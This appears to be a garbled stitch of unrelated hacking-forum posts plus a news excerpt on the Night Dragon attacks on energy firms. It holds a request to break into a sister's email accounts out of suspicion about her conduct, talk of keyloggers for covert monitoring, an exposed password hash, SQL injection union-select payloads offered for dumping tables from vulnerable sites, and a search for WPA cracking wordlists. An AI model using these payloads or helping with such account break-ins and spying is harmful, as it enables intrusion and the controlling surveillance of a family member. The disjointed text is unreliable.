hi guys my sister who lives in italy is acting very strange. And i heard things i dont like to say.
her hotmail is [email protected]
her itaian is [email protected]
i tried everything - and as the oldest brother its a matter of priority
thnk u
Anybody have anything like this? I wonder if it's possible to copy the contents of this device. Or on the other hand if someone has a better tool than this I'm all ears.
http://www.gadgetsandgear.com/computer-spy-software-remote-monitoring.html
Ive tried Family Key logger ,, and perfect keylogger... they don't get all the Keys Logged, no matter the settings.
$1$WtuBqDDO$u.Nklbn0KaEL2f0TmCgqu0
ok i know this is the best community for this question,
currently i am running & learning BT4 r2 ,but want to use different but good pentesting distro,
any suggestions ?
all the high council members i want your suggestions.
So i was wondering if i could retrieve the IP address from the sender of an email, and then trace it to there locations. Im not to familiar with tracing or retrieving IP addresses, so any help is appreciated. Thanks
I would just like to correct some queries for sql injection so that some would not have some problems in inserting queries to an sql vulnerable site.
PROBLEM
union select 1,2,group_concat(table_name),4,5 from information_schema.tables--
or
union select all 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()
And so here is the latest update in order to fix the problem:
Updated
union select 1,2,group_concat(table_name),4,5 +from+information_schema.tables+where+ table_schema=database()--
or
==================================
By: John E Dunn On: 24 Feb 2011 For: Techworld.com
A new U.S. report also alleges that the companies did not disclose the attacks to regulators
The Western energy companies at the centre of the alleged 'Night Dragon' attacks by Chinese hackers uncovered earlier this month have been named as Exxon, Shell, BP, Marathon, ConocoPhillips and oil services company Baker Hughes, according to U.S. reports.
The attacks were revealed by McAfee last month, which documented a sustained, long-running and ultimately successful campaign by Chinese-based attackers to penetrate major energy companies in order to steal sensitive documents.
An unsourced report for Bloomberg has named the companies involved which in truth is more akin to running down a list of the usual suspects. McAfee's document on Night Dragon left little to the imagination in working out which companies the attackers had targeted during the campaign.
Mitigating cloud server risks during DDoS attacks: During recent DDoS attacks, the hackers are able to bring down all customers hosted on the targeted customer's service. Suggestions for mitigating that risk?
- It is for a contest and I have no f'in idea, lol. Any suggestions would be appreciated, unless it is to use VS to build a GUI in order to trace the attackers IP address in order to go and kill their Grandmas. Thanks!
Anyone know where I can get some nice wordlists for wpa / wpa2 cracking. Im using backtract w/ an Alfa USB and wanted to grow my collection. I already have some lists I gathered from various places, not a large collection, and wanted something good and more reliable then the small stuff i got.